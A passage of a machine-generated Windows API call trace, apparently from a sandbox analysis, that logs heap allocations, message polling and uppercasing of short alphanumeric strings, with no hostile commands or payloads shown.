returned 0x24a9f18 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0195.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x129d0) returned 0x34c2258 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0195.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0195.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0195.698] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0195.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0195.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.700] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.701] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.701] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0195.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0195.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.702] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.703] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.703] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.703] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.704] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.704] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.704] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.704] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.705] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.705] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.705] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.705] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.705] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.706] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.706] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.707] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.707] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 